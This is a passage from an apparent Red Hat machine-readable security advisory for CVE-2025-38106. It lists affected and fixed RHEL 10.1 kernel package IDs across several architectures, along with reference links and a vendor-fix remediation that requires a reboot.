"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-38106"
},
{
"category": "external",
"summary": "RHBZ#2376077",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376077"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-38106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38106"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-38106",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38106"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-cve-announce/2025070322-CVE-2025-38106-8de3@gregkh/T",
"url": "https://lore.kernel.org/linux-cve-announce/2025070322-CVE-2025-38106-8de3@gregkh/T"
}
],
"release_date": "2025-07-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-09T10:02:53+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
